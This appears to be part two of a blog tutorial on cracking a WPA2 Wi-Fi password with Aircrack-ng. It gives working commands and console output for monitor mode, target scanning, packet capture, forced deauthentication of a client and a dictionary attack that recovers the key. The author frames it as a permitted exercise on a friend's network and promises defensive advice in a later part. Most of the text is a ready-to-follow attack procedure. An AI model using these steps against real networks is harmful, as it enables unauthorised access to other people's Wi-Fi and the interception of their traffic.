Part II: The crack

Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal! Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)



1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to turn your wirelss card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver wlan1           Broadcom         b43 - [phy0] wlan0           Realtek RTL8187L rtl8187 - [phy1]                                  (monitor mode enabled on mon0)

Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.



2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID                      00:16:50:59:52:9C  -50       63        1    0   6  54e  WPA  TKIP   PSK  Scuba  00:22:75:31:11:5A  -51       32        3    0   1  54e  WPA2 CCMP   PSK  MyNetwork  00:12:34:56:98:AB  -53       47        2    0   3  54e. WPA2 CCMP   PSK  Target_Net  00:11:95:DD:8D:99  -60       16        2    0   1  54   WEP  WEP         Private Network  00:22:74:52:86:3F  -61       28       16    0   7  54e  WPA2 CCMP   PSK  Belkin_N_Wireless_02843F  00:02:63:50:20:22  -61       30       43    0   9  11 . OPN              OpenNet    BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -39    0 -36e     0        6  Target_Net

Hit Ctrl+C to stop the capture and note the target's Channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. That WEP would just be too easy!)



3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

CH  3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net  BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net

Now we can simply wait for a WPA handshake to occur, or we can try and push things along.



4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34  Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 21:43:34  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB] 21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB] 21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]

How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

CH  3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net  BSSID              STATION            PWR   Rate    Lost  Packets  Probes  00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net

5. Apply a little brute force
We have all the data we need, now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3, the password wordlist you downloaded last time, and run them through aircrack-ng. The format is;

aircrack-ng -w(dictionary file) (data file)

You'll see that Step 3's saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries the possible password combinations.

Aircrack-ng 1.1 r1904                    [00:32:51] 850148 keys tested (455.42 k/s)                            KEY FOUND! [ swedishchef ]       Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB                        6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE       Transient Key  : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92                        14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF                        18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0                        21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08       EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2

Bingo! And there's our password. Simple as that!



So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!